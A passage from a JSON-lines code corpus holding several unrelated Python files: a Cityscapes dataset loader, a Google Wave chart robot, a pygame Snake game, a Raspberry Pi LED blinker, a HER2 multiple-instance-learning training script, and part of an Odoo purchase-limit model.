y_list = [p['y'] for p in point_list]\n # x_list = [p['x'] for p in point_list]\n # img_prop_lbl = hi.points_on_image(y_list, x_list, inv_transform(images), radius=10)\n # hu.save_image('tmp.png', img_prop_lbl)\n\n assert flipped == False\n # cost_mask = CsObject().get_clicks_from_polygons(images.size(1), images.size(2), polygons)\n # cost = torch.from_numpy(cost)\n\n # masks, cost = targets\n # regions = self.region[index]\n \n # batch_dict = {'images':img, \n # 'masks':mask,\n # 'meta':{'index':index, 'split':self.split, 'size':(H,W), 'name':name}}\n # point_list = pascal.get\n H,W = images.shape[-2:]\n points = torch.ones((H,W)) * 255\n for p in point_list:\n points[p['y'], p['x']] = p['cls']\n # hu.save_image(fname='tmp.png', img=hu.get_image(images, denorm=True), \n # points=(points!=255), )\n batch = {\"images\": images,\n # \"cost_mask\": cost_mask,\n # \"region_list\": region_list,\n # 'inst':inst,\n 'point_list':point_list,\n 'points':points,\n 'flipped':flipped,\n \"masks\": targets,\n \"original\":inv_transform(images),\n \"meta\": {\"index\": index,\n 'hash':hu.hash_dict({'id':index, 'split':self.split}),\n \"name\": self.dataset.images[index],\n \"size\": images.shape[-2:],\n \"image_id\": index,\n \"split\": self.split}}\n return batch\n\n# =====================================\n# helpers\ndef get_random(y_list, x_list):\n with hu.random_seed(1):\n yi = np.random.choice(y_list)\n x_tmp = x_list[y_list == yi]\n xi = np.random.choice(x_tmp)\n\n return yi, xi\n\ndef get_median(y_list, x_list):\n tmp = y_list\n mid = max(0, len(tmp)//2 - 1)\n yi = tmp[mid]\n tmp = x_list[y_list == yi]\n mid = max(0, len(tmp)//2 - 1)\n xi = tmp[mid]\n\n return yi, xi\n\ndef joint_transform(image, targets, resize=False, flip=False):\n mask = targets\n\n # Resize\n if resize:\n image = transforms.Resize(size=512, interpolation=Image.BILINEAR)(image)\n mask = transforms.Resize(size=512, interpolation=Image.NEAREST)(mask)\n\n # Random crop\n # i, j, h, w = transforms.RandomCrop.get_params(\n # image, output_size=(256, 512))\n # image = FT.crop(image, i, j, h, w)\n # mask = FT.crop(mask, i, j, h, w)\n\n # Random horizontal flipping\n flipped = False\n if np.random.randint(2) == 0 and flip:\n image = FT.hflip(image)\n mask = FT.hflip(mask)\n flipped = True\n\n # # Random vertical flipping\n # if random.random() > 0.5:\n # image = FT.vflip(image)\n # mask = FT.vflip(mask)\n\n # Transform to tensor\n image = FT.to_tensor(image)\n mask = torch.from_numpy(np.array(mask))\n mask = mask.long()\n\n mean = [0.485, 0.456, 0.406]\n std = [0.229, 0.224, 0.225]\n\n image_normalized = transforms.Normalize(mean=mean, std=std)(image)\n\n # cost = CsObject().get_clicks_from_polygons(image.size(1), image.size(2), polygons)\n # cost = torch.from_numpy(cost)\n # return image_normalized, (mask, cost)\n return image_normalized, mask, flipped\n\n# =====================================\n# helpers\ndef joint_transform_val(image, targets, resize=False):\n mask = targets\n if resize:\n # Resize\n image = transforms.Resize(size=512, interpolation=Image.BILINEAR)(image)\n mask = transforms.Resize(size=512, interpolation=Image.NEAREST)(mask)\n\n # # Random crop\n # i, j, h, w = transforms.RandomCrop.get_params(\n # image, output_size=(256, 512))\n # image = FT.crop(image, i, j, h, w)\n # mask = FT.crop(mask, i, j, h, w)\n\n # # Random horizontal flipping\n # if random.random() > 0.5:\n # image = FT.hflip(image)\n # mask = FT.hflip(mask)\n\n # # Random vertical flipping\n # if random.random() > 0.5:\n # image = FT.vflip(image)\n # mask = FT.vflip(mask)\n\n # Transform to tensor\n image = FT.to_tensor(image)\n mask = torch.from_numpy(np.array(mask))\n mask = mask.long()\n\n mean = [0.485, 0.456, 0.406]\n std = [0.229, 0.224, 0.225]\n\n image_normalized = transforms.Normalize(mean=mean, std=std)(image)\n\n # cost = CsObject().get_clicks_from_polygons(image.size(1), image.size(2), polygons)\n # cost = torch.from_numpy(cost)\n # return image_normalized, (mask, cost)\n flipped = False\n return image_normalized, mask, flipped\n\ndef inv_transform(images):\n inv_normalize = transforms.Normalize(\n mean=[-0.485/0.229, -0.456/0.224, -0.406/0.225],\n std=[1/0.229, 1/0.224, 1/0.255])\n\n inv_image = inv_normalize(images.float())\n images_arr = np.array(FT.to_pil_image(inv_image.float()))\n\n return images_arr\n\n\nclass CityScapesTrainIds(datasets.Cityscapes):\n def __init__(self, root, split='train', mode='fine', target_type='instance',\n transform=None, target_transform=None, transforms=None):\n super().__init__(root, split, mode, target_type,\n transform, target_transform, transforms)\n\n def _get_target_suffix(self, mode, target_type):\n if target_type == 'instance':\n return '{}_instanceIds.png'.format(mode)\n elif target_type == 'semantic':\n # return '{}_labelIds.png'.format(mode)\n return '{}_labelTrainIds.png'.format(mode)\n elif target_type == 'color':\n return '{}_color.png'.format(mode)\n else:\n return '{}_polygons.json'.format(mode)\n\n\nif __name__ == \"__main__\":\n dataset = CityScapes(split=\"train\", exp_dict={})\n batch = dataset[0]\n images = batch[\"images\"]\n masks = batch[\"masks\"]\n\n inv_normalize = transforms.Normalize(\n mean=[-0.485/0.229, -0.456/0.224, -0.406/0.225],\n std=[1/0.229, 1/0.224, 1/0.255])\n\n inv_image = inv_normalize(images.float())\n \n # combined = 0.5*inv_image + 0.5*masks\n masks_arr = np.array(FT.to_pil_image(masks.float()))\n images_arr = np.array(FT.to_pil_image(inv_image.float()))\n\n image_label_overlay = label2rgb(masks_arr, image=images_arr)\n\n inv_image = FT.to_pil_image(inv_image)\n\n plt.imshow(images_arr)\n plt.savefig(\"img.png\")\n plt.imshow(masks_arr)\n plt.savefig(\"mask.png\")\n plt.imshow(image_label_overlay)\n plt.savefig(\"overlay.png\")","repo_name":"IssamLaradji/affinity_lcfcn","sub_path":"src/datasets/cityscapes.py","file_name":"cityscapes.py","file_ext":"py","file_size_in_byte":10435,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"48"} +{"seq_id":"71370615505","text":"import logging\nimport re\n\nfrom api import document\nfrom api import events\nfrom api import model\nfrom api import robot\n\nROBOT_NAME = 'graphy'\n\n\nclass WaveEnv(object):\n def __init__(self, context):\n self.result = None\n self.api = context\n\ndef FindImageElement(blip):\n elements = blip.GetDocument()._blip_data.elements\n if elements:\n for key in elements:\n element = elements[key]\n if element['type'] == 'IMAGE' and u'properties' in element and \\\n u'url' in element['properties']:\n url = element['properties']['url']\n \n if \"http://chart.apis.google.com/chart?\" in url:\n return (element, key)\n return (None, None)\n\ndef GenerateChartUrlFromText(text):\n if \"graph:\" not in text.lower():\n return None\n after = text[(text.lower().find(\"graph:\") + 6):]\n datarows = []\n \n datalinere = re.compile(\n \"([^:]+[:])?([ \\t]*[0-9]+)([ \\t]*[,][ \\t]*[0-9]+)*[ \\t]*\")\n mdata = 0\n for line in after.split(\"\\n\"):\n linematch = datalinere.match(line.strip())\n if linematch:\n line = linematch.group(0)\n row = {}\n if \":\" in line:\n sl = line.split(\":\")\n row['name'] = sl[0]\n line = sl[1]\n dataelems = [i.strip() for i in line.split(\",\")]\n m = max([float(i) for i in dataelems])\n if m > mdata:\n mdata = m\n row['data'] = dataelems\n datarows.append(row)\n dim = 0\n for row in datarows:\n d = len(row['data'])\n if d > dim:\n dim = d\n \n mdata = mdata / 100.0\n if dim == 1:\n # pie chart\n nums = []\n names = []\n for row in datarows:\n nums.append(row['data'][0])\n if 'name' in row:\n names.append(row['name'])\n url = \"http://chart.apis.google.com/chart?cht=p3&chs=375x150&chd=t:\"\n url += \",\".join([str(float(i)/mdata) for i in nums])\n if len(nums) == len(names):\n url += \"&chl=\" + \"%7C\".join(names)\n url = url.replace(\" \", \"%20\")\n logging.info(\"Pie chart url: \" + url)\n return url\n else:\n # line graph\n url = \"http://chart.apis.google.com/chart?cht=lc&chs=375x150\"\n # line colors\n url += \"&chco=ff0000,0000ff,00ff00,ffff00,00ffff,ff00ff\"\n # background gradiant\n url += \"&chf=c,lg,90,76A4FB,0,FFFFFF,0.75|bg,s,FFFFFF\"\n # data\n url += \"&chd=t:\"\n nums = []\n names = []\n for row in datarows:\n nums.append(row['data'])\n if 'name' in row:\n names.append(row['name'])\n url += \"|\".join([\",\".join([str(float(j)/mdata) for j in i]) for i in nums])\n if len(nums) == len(names):\n url += \"&chdl=\" + \"|\".join(names)\n url = url.replace(\" \", \"%20\")\n logging.info(\"Line graph url: \" + url)\n return url\n\ndef OnDocumentChanged(properties, context):\n \"\"\"Invoked when the document changes.\"\"\"\n blip_id = properties['blipId']\n blip = context.GetBlipById(blip_id)\n text = blip.GetDocument().GetText()\n url = GenerateChartUrlFromText(text)\n if not url:\n return\n imgElement, elemnum = FindImageElement(blip)\n if imgElement:\n if imgElement['properties']['url'] == url:\n logging.info(\"Url already exists.\")\n return\n\n element = document.Image(url)\n if imgElement:\n blip.GetDocument().ReplaceElement(elemnum, element)\n else:\n blip.GetDocument().AppendElement(element)\n\nif __name__ == '__main__':\n graphy = robot.Robot(ROBOT_NAME.capitalize())\n graphy.RegisterHandler(events.DOCUMENT_CHANGED,\n OnDocumentChanged)\n graphy.Run(debug=True)\n","repo_name":"JackDanger/google-wave-samples","sub_path":"extensions/robots/python/graphy/graphy.py","file_name":"graphy.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"4022879957","text":"# Pygame Imports\nimport pygame\nfrom pygame import Surface\nfrom pygame import Rect\n\n\nclass Snake:\n def __init__(self, color: tuple, x: int, y: int, width: int, height: int, size: int = 3) -> None:\n # Basics Attributes\n self.width: int = width\n self.height: int = height\n self.color: tuple = color\n self.x: int = x\n self.y: int = y\n self.size: int = size\n self.direction: tuple[int, int] = [1, 0]\n self._positions: list = [(self.x, self.y),]\n\n # Create first shape\n self.add_shape()\n self.add_shape()\n self.add_shape()\n\n def area(self) -> tuple:\n return (self.x, self.y), (self.x + self.width, self.y), (self.x + self.width, self.y + self.height), (self.x, self.y + self.height)\n\n def move(self) -> list:\n \"\"\"Ajust positions by a vector 2d\"\"\"\n\n self._positions.insert(0, (\n self._positions[0][0] + self.width * self.direction[0], \n self._positions[0][1] + self.height * self.direction[1]\n ))\n\n self.x = self._positions[0][0] + self.width * self.direction[0]\n self.y = self._positions[0][1] + self.height * self.direction[1]\n\n del self._positions[-1]\n\n def add_shape(self) -> None:\n \"\"\"Create a shape in the end of snake\"\"\"\n\n self._positions.append((\n self._positions[-1][0] - self.width * self.direction[0], \n self._positions[-1][1] - self.height * self.direction[1]\n ))\n\n def draw(self, surface: Surface) -> tuple:\n for pos in self._positions:\n pygame.draw.rect(surface, self.color, Rect(*pos, self.width, self.height))\n\n\nclass Food:\n def __init__(self, color: tuple, x: int, y: int, width: int, height: int) -> None:\n self.color: tuple = color\n self.x: int = x\n self.y: int = y\n self.width: int = width\n self.height: int = height\n\n def area(self) -> tuple:\n return [(self.x, self.y), (self.x + self.width, self.y), (self.x + self.width, self.y + self.height), (self.x, self.y + self.height)]\n\n def draw(self, surface: Surface) -> tuple:\n pygame.draw.rect(surface, self.color, Rect(self.x, self.y, self.width, self.height))\n","repo_name":"cristilianojr/Snake-Game","sub_path":"edit/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1127076125","text":"###########################################################################################\n# Name: Norman Cook\n# Date: 06-28-2019\n# Description: Continuously blink an LED at 0.5 s intervals and change the\n# interval to 0.1 s if a switch is closed using a Raspberry Pi.\n################################################################################\n\n# import necessary libraries\nimport RPi.GPIO as GPIO\nfrom time import sleep\n\n# set the button and led pin numbers\nled = 17\nbutton = 25\n\n# setup the led and buttion with the GPIO\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(led, GPIO.OUT)\nGPIO.setup(button, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\n# blink the LED \nwhile (True):\n GPIO.output(led, GPIO.HIGH)\n sleep(0.5)\n GPIO.output(led, GPIO.LOW)\n sleep(0.5)\n while (GPIO.input(button) == GPIO.HIGH):\n GPIO.output(led, GPIO.HIGH)\n sleep(0.1)\n GPIO.output(led, GPIO.LOW)\n sleep(0.1)\n\n","repo_name":"frankiecook/classwork","sub_path":"python/LED-the-Way.py","file_name":"LED-the-Way.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7124108393","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Rawan Abdulsadig\n\"\"\"\n\nimport pickle\nimport pandas as pd\nimport time\nimport h5py\nimport torch\nfrom torchvision import models, transforms\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\nfrom sklearn.model_selection import KFold\n\n\ndef get_bag_of_instances(X_ , Y_ , S_ ,transform, bag_size, iterations):\n '''\n Parameters\n ----------\n X_ : np.array\n an array of image patches \n Y_ : np.array\n an array of patch labels (patches extracted from the same slide image should have the same label corresponding to the slide HER2 score)\n S_ : np.array\n an array of slide numbers/ids corresponding to the patches\n transform : torchvision.transforms object\n a transforms object to apply image prerpocessing and augmentation\n bag_size : int\n the number of patch instances in the bag\n iterations : int\n the number of bags to be obtained when iterating through the function\n\n Yields\n ------\n a tuple of 2 torch tensors\n first element: 4-dimentional tensor representing the bag of transformed patch images\n second element: a tensor containing the label of the bag\n '''\n for _ in range(iterations):\n #Choosing a random slide number/id\n slids = np.unique(S_)\n s = np.random.choice(slids)\n #Obtaining the HER2 score of that slide\n label = np.max(Y_[S_==s]) # no critical reason for using max, they all should be the same anyway\n x = X_[S_==s] #filtering the patches corresponding to the selected slide\n x_bag = x[np.random.choice(x.shape[0], size=bag_size, replace=False)] #Obtaining a random sample of patch images from x to represent the bag, sampling without replacement\n x_tesnor_bag = torch.empty(size=(bag_size, 3, 96, 96))\n for i in range(bag_size):\n x_tesnor_bag[i] = transform(x_bag[i]) #preprocessing and augmenting the patches then storing them in a torch.tensor (torchvision.transforms only work on one image at a time)\n yield x_tesnor_bag , torch.tensor(label)\n\ndef get_batch_of_bags(X_, Y_, S_, transform, bag_size , batch_size , iterations , seed = None):\n '''\n\n Parameters\n ----------\n X_ : np.array\n an array of image patches \n Y_ : np.array\n an array of patch labels (patches extracted from the same slide image should have the same label corresponding to the slide HER2 score)\n S_ : np.array\n an array of slide numbers/ids corresponding to the patches\n transform : torchvision.transforms object\n a transforms object to apply image prerpocessing and augmentation\n bag_size : int\n the number of patch instances in the bag\n batch_size : int\n the number of bags of patches in a batch\n iterations : int\n the number of batches to be obtained when iterating through the function\n seed : int, optional\n a random seed that can be set to reproduce the exact same batches of bags everytime the function is used, or can be set to None to obtain different batches of bags each time. The default is None.\n\n Yields\n ------\n batch_of_bags : 5-dimensional torch.tensor\n a batch of bags of patch images\n batch_of_labels: 1-dimentional torch.tensor\n a batch of labels corresponding to the bags\n\n '''\n np.random.seed(seed)\n for _ in range(iterations):\n batch_of_bags = torch.empty(size=(batch_size, bag_size, 3, 96, 96))\n batch_of_labels = torch.empty(size=(batch_size))\n for i,(images, label) in enumerate(get_bag_of_instances(X_, Y_, S_ , transform=transform\n ,bag_size = bag_size , iterations = batch_size)):\n batch_of_bags[i] = images\n batch_of_labels[i] = label\n yield batch_of_bags , batch_of_labels\n\nclass AddGaussianNoise(object):\n '''\n To be used as an augmentation method within \"transforms\"\n '''\n def __init__(self, mean=0., std=1.):\n self.std = std\n self.mean = mean\n\n def __call__(self, tensor):\n return tensor + torch.randn(tensor.size()) * self.std + self.mean\n\n\n\nclass MILNetwork(nn.Module):\n def __init__(self , embeddeing_model , bag_size , batch_size , classes):\n '''\n Parameters\n ----------\n embeddeing_model : model object\n the pre-trained patch embedding model \n bag_size : int\n the number of patch images in a bag\n batch_size : int\n the number of bags in a batch\n classes : int\n the number of target classes, 4 for HER2 grades or 2 for HER2 positive/negative\n\n '''\n super(MILNetwork, self).__init__()\n self.bag_size = bag_size\n self.batch_size = batch_size\n self.embedder = embeddeing_model\n self.fc1 = nn.Linear(1024, classes)\n self.attention = nn.Sequential(\n nn.Conv1d(1024,256,1),\n nn.Tanh(),\n nn.Conv1d(256,1,1))\n\n def forward(self, x):\n out = torch.empty(size=(self.batch_size, 1024, self.bag_size)).cuda()\n for i in range(x.shape[0]):\n x_ = self.embedder.forward(x[i])\n x_ = x_.view(-1,1024)\n out[i] = x_.permute(1,0)\n A = self.attention(out)\n A = F.softmax(A , dim =2)\n M = torch.bmm(A, torch.transpose(out , 2, 1))\n M = M.view(-1, 1024)\n out = self.fc1(M)\n return out\n \n\ndef Train_Model(model , From, criterion , optimizer , n_epochs , bag_size, batch_size, filename, x_train,y_train,s_train,x_valid,y_valid,s_valid):\n '''\n \n Parameters\n ----------\n model : MILNetwork object\n initialized MIL model object\n From : string\n a string specifiying what type of source domain images the embedding model is transfered from, either 'ImageNet', 'PCAM' , 'IHC' or 'Random'\n criterion : loss function object\n optimizer : optim optimizer object\n n_epochs : int\n number of epochs\n bag_size : int\n number of patch images in a bag\n batch_size : int\n number of bags in a batch\n filename : string\n a file name to be used when saving the model parameters\n x_train : np.array\n training patch images\n y_train : np.array\n training patch image labels \n s_train : np.array\n training slide number/id\n x_valid : np.array\n validation patch images\n y_valid : np.array\n validation patch image labels \n s_valid : np.array\n validation slide number/id\n\n Returns\n -------\n training_loss : np.array\n the recorded training losses in each epoch\n validation_loss : np.array\n the recorded validation losses in each epoch\n training_acc : np.array\n the recorded training accuracies in each epoch\n validation_acc : np.array\n the recorded validation accuracies in each epoch\n\n '''\n\n min_valid_loss , max_valid_acc = np.Inf , 0.0\n training_iterations = 100\n validation_iterations = 25\n valid_loss_min = min_valid_loss\n valid_acc_max = max_valid_acc\n training_loss , validation_loss = [], []\n training_acc , validation_acc = [] , []\n \n for epoch in range(1, n_epochs+1):\n train_loss = 0.0\n valid_loss = 0.0\n \n ############\n # Training #\n ############\n y_true , y_pred = [] , []\n model.train()\n # preparing the transform object for training\n if From == 'Random':\n transform = transforms.Compose([transforms.ToPILImage(mode= 'RGB'), transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n transforms.RandomAffine(degrees=10, translate=(0.1,0.1), scale=(0.8,1.2), shear=10, fillcolor=(245, 245, 245)),\n transforms.ToTensor()\n ,transforms.RandomApply([AddGaussianNoise(0., 0.1)], p=0.5)\n ])\n elif From == 'ImageNet':\n transform = transforms.Compose([transforms.ToPILImage(mode= 'RGB'), transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n transforms.RandomAffine(degrees=10, translate=(0.1,0.1), scale=(0.8,1.2), shear=10, fillcolor=(245, 245, 245)),\n transforms.ToTensor(), transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ,transforms.RandomApply([AddGaussianNoise(0., 0.1)], p=0.5)\n ])\n elif From == 'PCAM':\n transform = transforms.Compose([transforms.ToPILImage(mode= 'RGB'), transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n transforms.RandomAffine(degrees=10, translate=(0.1,0.1), scale=(0.8,1.2), shear=10, fillcolor=(245, 245, 245)),\n transforms.ToTensor(), transforms.Normalize(mean=[1.0294, 0.5995, 1.3757], std=[0.8379, 1.0470, 0.8024])\n ,transforms.RandomApply([AddGaussianNoise(0., 0.1)], p=0.5)\n ])\n elif From == 'IHC':\n transform = transforms.Compose([transforms.ToPILImage(mode= 'RGB'), transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n transforms.RandomAffine(degrees=10, translate=(0.1,0.1), scale=(0.8,1.2), shear=10, fillcolor=(245, 245, 245)),\n transforms.ToTensor(), transforms.Normalize(mean=[1.4128, 1.4503, 1.5884], std=[0.5338, 0.6164, 0.6477])\n ,transforms.RandomApply([AddGaussianNoise(0., 0.1)], p=0.5)\n ])\n \n for data, target in get_batch_of_bags(x_train, y_train, s_train, transform, bag_size , batch_size , training_iterations):\n data, target = data.cuda(), target.cuda()\n optimizer.zero_grad()\n output = model(data)\n loss = criterion(output, target.long())\n loss.backward()\n optimizer.step()\n train_loss += loss.item()\n _, pred = torch.max(output, 1)\n y_true.extend(target.cpu().numpy())\n y_pred.extend(pred.cpu().numpy())\n data, target = data.cpu(), target.cpu() # to free up cuda memory\n _ , pred = _.cpu(), pred.cpu() # to free up cuda memory\n training_acc.append(np.sum(np.array(y_true) == np.array(y_pred)) / (training_iterations*batch_size))\n training_loss.append(train_loss/training_iterations)\n \n ##############\n # Validation #\n ##############\n y_true , y_pred = [] , []\n model.eval()\n # preparing the transform object for validation\n if From == 'Random':\n transform = transforms.Compose([transforms.ToPILImage(mode= 'RGB'), transforms.ToTensor()])\n elif From == 'ImageNet':\n transform = transforms.Compose([transforms.ToPILImage(mode= 'RGB'), transforms.ToTensor(),transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n elif From == 'PCAM':\n transform = transforms.Compose([transforms.ToPILImage(mode= 'RGB'), transforms.ToTensor(),transforms.Normalize(mean=[1.0294, 0.5995, 1.3757], std=[0.8379, 1.0470, 0.8024])])\n elif From == 'IHC':\n transform = transforms.Compose([transforms.ToPILImage(mode= 'RGB'), transforms.ToTensor(),transforms.Normalize(mean=[1.4128, 1.4503, 1.5884], std=[0.5338, 0.6164, 0.6477])])\n\n for data, target in get_batch_of_bags(x_valid, y_valid, s_valid, transform, bag_size , batch_size , validation_iterations, seed=123):\n data, target = data.cuda(), target.cuda()\n output = model(data)\n loss = criterion(output, target.long())\n valid_loss += loss.item()\n _, pred = torch.max(output, 1)\n y_true.extend(target.cpu().numpy())\n y_pred.extend(pred.cpu().numpy())\n data, target = data.cpu(), target.cpu() # to free up cuda memory\n _, pred = _.cpu(), pred.cpu()\n validation_acc.append(np.sum(np.array(y_true) == np.array(y_pred)) / (validation_iterations*batch_size))\n validation_loss.append(valid_loss/validation_iterations)\n torch.save(model.state_dict(), filename+'.pt')\n if validation_loss[-1] <= valid_loss_min:\n torch.save(model.state_dict(), filename+'.pt')\n valid_loss_min = validation_loss[-1]\n # if validation_acc[-1] >= valid_acc_max:\n # torch.save(model.state_dict(), filename+'.pt')\n # valid_acc_max = validation_acc[-1]\n \n return training_loss , validation_loss , training_acc , validation_acc\n\n\ndef Print(text , filename):\n with open(filename, \"a\") as file_object:\n file_object.write(text)\n\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nif __name__ == \"__main__\":\n Folder = '/MIL-CrossValidation/'\n batch_size = 64\n bag_size = 100\n n_epochs = 50\n lr = 1e-03\n wd = 1e-07\n Target = 'Multiclass' #Binary/Multiclass\n From = 'PCAM' # Random/ImageNet/PCAM/IHC\n itr = 1\n\n trial_name = '5FoldCV - MIL-Att - H&E-HER2 '+Target+' - AlexNet-Embedder -'+From+' - lr = '+str(lr)+' wd = '+str(wd)+' bag_size = '+str(bag_size)+' batch_size = '+str(batch_size)+' -'\n output_file = Folder+trial_name+' outputs.txt'\n # print(trial_name)\n Print(trial_name+'\\n' , output_file)\n\n # importing the data\n X = h5py.File('/HER2_HE_96x96_training.h5', 'r')['x']\n Y = h5py.File('/HER2_HE_96x96_training.h5', 'r')['y']\n S = h5py.File('/HER2_HE_96x96_training.h5', 'r')['s']\n \n X , Y , S = np.array(X) ,np.array(Y), np.array(S)\n\n if Target == 'Binary':\n # constructing a binary classification dataset from the multiclass dataset\n Y[Y==1] = 0\n Y[Y==3] = 1\n Y[Y==2] = 1\n classes = [0 , 1]\n \n elif Target == 'Multiclass':\n classes = [0 , 1 , 2 , 3]\n\n\n Training_Loss, Training_Acc, Validation_Loss, Validation_Acc = pd.DataFrame([]), pd.DataFrame([]), pd.DataFrame([]), pd.DataFrame([])\n\n itr = 0\n slides = np.unique(S)\n kf = KFold(n_splits=5, random_state=123, shuffle=True)\n for train_index, valid_index in kf.split(slides):\n itr += 1\n boolidx = False\n for s in slides[train_index]:\n boolidx= np.logical_or(boolidx , np.array(S)==s)\n x_train = X[boolidx]\n y_train = Y[boolidx]\n s_train = S[boolidx]\n boolidx = False\n for s in slides[valid_index]:\n boolidx= np.logical_or(boolidx , np.array(S)==s)\n x_valid = X[boolidx]\n y_valid = Y[boolidx]\n s_valid = S[boolidx]\n Print('Starting '+trial_name+str(itr)+'...'+'\\n' , output_file)\n # print('Starting '+trial_name+str(itr)+'...')\n\n if From == 'Random':\n AlexNet = models.alexnet(pretrained = False).features\n elif From == 'ImageNet':\n AlexNet = models.alexnet(pretrained = True).features\n elif From == 'PCAM':\n AlexNet = models.alexnet()\n n_inputs = AlexNet.classifier[6].in_features\n AlexNet.classifier[6] = nn.Linear(n_inputs, 2)\n AlexNet = nn.DataParallel(AlexNet)\n AlexNet.load_state_dict(torch.load('PCAM-pretrained_AlexNet.pt'))\n AlexNet = AlexNet.module.features\n elif From == 'IHC':\n AlexNet = models.alexnet()\n n_inputs = AlexNet.classifier[6].in_features\n AlexNet.classifier[6] = nn.Linear(n_inputs, 4)\n AlexNet = nn.DataParallel(AlexNet)\n AlexNet.load_state_dict(torch.load('IHC-pretrained_AlexNet.pt'))\n AlexNet = AlexNet.module.features\n \n for param in AlexNet.parameters():\n param.requires_grad = False\n \n AlexNet = AlexNet.cuda()\n startt = time.time()\n MIL = MILNetwork(AlexNet , bag_size , batch_size , len(classes)).cuda()\n optimizer = optim.Adam(MIL.parameters(), lr=lr, weight_decay = wd)\n criterion = nn.CrossEntropyLoss()\n training_loss , validation_loss , training_acc , validation_acc = Train_Model(MIL , From, criterion , optimizer , n_epochs , bag_size, batch_size,\n Folder+trial_name+str(itr), x_train.copy(),y_train.copy(),s_train.copy(),x_valid.copy(),y_valid.copy(),s_valid.copy())\n endt = time.time()\n p = '('+str(round((endt-startt)/60))+ ' minutes) \\t'+'Maximum validation accuracy was: '+str(max(validation_acc))+', and the minimum validation loss was: '+str(min(validation_loss))\n # print(p)\n Print(p+'\\n' , output_file)\n\n Training_Loss['CV'+str(itr)] = training_loss\n Training_Acc['CV'+str(itr)] = training_acc\n Validation_Loss['CV'+str(itr)] = validation_loss\n Validation_Acc['CV'+str(itr)] = validation_acc\n\n del MIL\n del x_train\n del y_train\n del s_train\n del x_valid\n del y_valid\n del s_valid\n\n with open(Folder+trial_name+'_TraningProgresses.pkl', 'wb') as f:\n pickle.dump((Training_Loss, Training_Acc, Validation_Loss, Validation_Acc) , f)\n\n ","repo_name":"RawanSaifAldeen/HER2-Scoring_MIL-Attention-Model","sub_path":"MIL-Attention- KfoldCV -Training.py","file_name":"MIL-Attention- KfoldCV -Training.py","file_ext":"py","file_size_in_byte":17929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5452507427","text":"from odoo import models, api, fields, _\nfrom odoo.addons import decimal_precision as dp\nfrom datetime import datetime, date, timedelta\nfrom dateutil.relativedelta import relativedelta\nimport bisect\nimport calendar\n\n\nclass ProductSupplierinfo(models.Model):\n _inherit = 'product.supplierinfo'\n\n limit_purchase_bool = fields.Boolean(\n string=_('Limit Purchase'),\n default=False\n )\n limit_purchase_range = fields.Selection([\n ('month', 'Monthly'),\n ('quarter', 'Quarterly'),\n ('anual', 'Annually'),\n ('custom', 'Custom')\n ], default='month',\n string=_('Date Range Limit'),\n help=_('* Monthly: from the first day of the current month until the'\n ' last day of the current month.\\n * Quarterly: from the first'\n 'day of the current quarter until the last day of the'\n 'current quarter. Quarters are defined like 01/01/YYYY - '\n '31/03/YYYY, etc.\\n * Annually: From the first day of the year'\n 'until the last day of the current year.\\n'\n '* Custom: Custom range.')\n )\n limit_purchase_quantity = fields.Float(\n string=_('Quantity Limit'),\n digits=dp.get_precision('Product Unit of Measure'),\n default=0.0\n )\n limit_purchase_actual = fields.Float(\n string=_('Quantity actual'),\n digits=dp.get_precision('Product Unit of Measure'),\n compute='_get_limit_purchase_actual',\n compute_sudo=True,\n )\n limit_purchase_purchase_line_warn = fields.Selection([\n ('none', _('None')),\n ('warm', _('Warning')),\n ('block', _('Blocking'))\n ], string=_(\"Warning In Lines\"),\n default='warm'\n )\n date_range_init = fields.Date(\n string=_('Date from'),\n default=fields.datetime.now().date()\n )\n date_range_end = fields.Date(\n string=_('Date to'),\n default=fields.datetime.now().date()+timedelta(days=30)\n )\n\n @api.multi\n @api.depends('limit_purchase_bool', 'limit_purchase_range')\n def _get_limit_purchase_actual(self):\n dates_range = {\n 'month': {},\n 'quarter': {},\n 'anual': {},\n }\n today = fields.datetime.now().date()\n # Month\n dates_range['month']['init'] =\\\n datetime.combine(\n date(today.year, today.month, 1),\n datetime.min.time()\n )\n dates_range['month']['end'] =\\\n datetime.combine(\n date(\n today.year,\n today.month,\n calendar.monthrange(today.year, today.month)[1]\n ),\n datetime.max.time()\n )\n # Quarter\n qbegins = [date(today.year, month, 1) for month in (1, 4, 7, 10)]\n idx = bisect.bisect(qbegins, today)\n dates_range['quarter']['init'] =\\\n datetime.combine(\n qbegins[idx-1],\n datetime.min.time()\n )\n dates_range['quarter']['end'] =\\\n datetime.combine(\n qbegins[idx-1] + relativedelta(months=3) - timedelta(days=1),\n datetime.max.time()\n )\n # Anual\n dates_range['anual']['init'] =\\\n datetime.combine(\n date(today.year, 1, 1),\n datetime.min.time()\n )\n dates_range['anual']['end'] =\\\n datetime.combine(\n date(today.year, 12, 31),\n datetime.max.time()\n )\n for sel in self.filtered(lambda x: x.limit_purchase_bool):\n if sel.limit_purchase_range != 'custom':\n date_init = 